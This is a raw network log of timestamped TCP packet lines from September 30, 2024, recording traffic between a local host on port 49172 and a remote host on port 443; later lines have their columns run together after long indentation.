Sep 30, 2024 16:24:34.170586109 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.170597076 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.170608044 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.170871019 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.170897961 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.170918941 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.170927048 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.170953035 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.171473980 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.174647093 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.174679041 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.174737930 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.174743891 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.174767971 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.177551985 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.177577972 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.177614927 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.177623034 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.177634001 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.178076029 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.178097963 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.178131104 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.178138971 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.178149939 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.180552959 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.224047899 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.224073887 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.224128008 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.224153996 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.224165916 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.224811077 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.258908033 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.258939981 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.258991003 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.259027958 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.259044886 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.259044886 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.259236097 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.259263039 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.259299994 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.259308100 CEST  443  49172  185.199.109.133  192.168.2.22
Sep 30, 2024 16:24:34.259320021 CEST  49172  443  192.168.2.22  185.199.109.133
Sep 30, 2024 16:24:34.260273933 CEST  443  49172  185.199.109.133  192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260296106 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260371923 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260390997 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260632038 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260658026 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260683060 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260689974 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260714054 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.260759115 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.261277914 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.261300087 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.261336088 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.261343002 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.261353016 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.266659975 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.266686916 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.266729116 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.266738892 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.266751051 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.267337084 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.267358065 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.267416954 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.267416954 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.267427921 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.267441034 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.312395096 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.312433958 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.312482119 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.312515020 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.312530041 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.347239017 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.347268105 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.347317934 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.347372055 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.347395897 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.347395897 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348334074 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348361015 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348385096 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348401070 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348414898 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348937988 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.348958969 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349001884 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349014044 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349033117 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349405050 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349431038 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349466085 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349477053 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349492073 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349499941 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349520922 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349544048 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349551916 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349564075 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.349581957 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.350706100 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.350739956 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.350769997 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.350785971 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.350805044 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.355742931 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.355766058 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.355829954 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.355854988 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.355865002 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.355865002 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.400928020 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.400954962 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401004076 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401037931 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401051998 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401911974 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401933908 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401966095 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401983023 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.401994944 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.436712980 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.436733961 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.436785936 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.436821938 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.436836958 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.436836958 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437490940 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437513113 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437552929 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437565088 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437587976 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437664032 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437684059 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437715054 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437724113 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437742949 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.437742949 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.438205004 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.438231945 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.438271999 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.438282967 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.438297033 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.439182997 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.439203978 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.439241886 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.439265013 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.439279079 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.444087982 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.756373882 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.756397009 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.756443024 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.756452084 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.756463051 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.791409969 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.791435957 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.791476965 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.791500092 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.791508913 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.791551113 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792032003 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792054892 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792090893 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792098045 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792113066 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792118073 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792576075 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792602062 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792629957 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792639017 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792649031 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.792676926 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.793034077 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.793055058 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.793087959 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.793098927 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.793109894 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.793138027 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.794631004 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.794656992 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.794682026 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.794692039 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.794703007 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.794715881 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.800149918 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.800179005 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.800213099 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.800224066 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.800250053 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.800250053 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.844818115 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.844846010 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.844875097 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.844887018 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.844912052 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.844947100 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.845156908 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.845185041 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.845230103 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.845237017 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.845247984 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.845266104 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.895379066 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.895427942 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.895494938 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.895517111 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.895529032 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896533966 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896549940 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896569967 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896576881 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896612883 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896624088 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896634102 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896641016 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896655083 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896675110 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896682978 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896717072 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.896744013 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.897686005 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.897727013 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.897766113 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.897774935 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.897810936 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.901086092 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.901110888 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.901143074 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.901151896 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.901163101 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.904721022 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.904742956 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.904782057 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.904792070 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.904803038 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.904901981 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.957806110 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.957850933 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.957878113 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.957917929 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.957937002 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.957947969 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.989999056 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990026951 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990072012 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990089893 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990094900 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990103006 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990123987 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990142107 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990159988 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990170956 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990200043 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990489960 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:34.990514040 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264489889 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264756918 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264780998 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264818907 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264833927 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264847040 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264941931 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.264962912 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.265000105 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.265011072 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.265023947 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.265084982 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.315551996 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.315586090 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.315711021 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.315769911 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.315788984 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.318536043 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.318562031 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.318608046 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.318620920 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.318629980 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.350624084 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.350650072 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.350692987 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.350711107 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.350728035 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.350728035 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.352055073 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.352076054 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.352124929 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.352133036 CEST44349172185.199.109.133192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:35.352154016 CEST49172443192.168.2.22185.199.109.133
                                                                                                                                                                                                Sep 30, 2024 16:24:35.352555037 CEST44349172185.199.109.133192.168.2.22
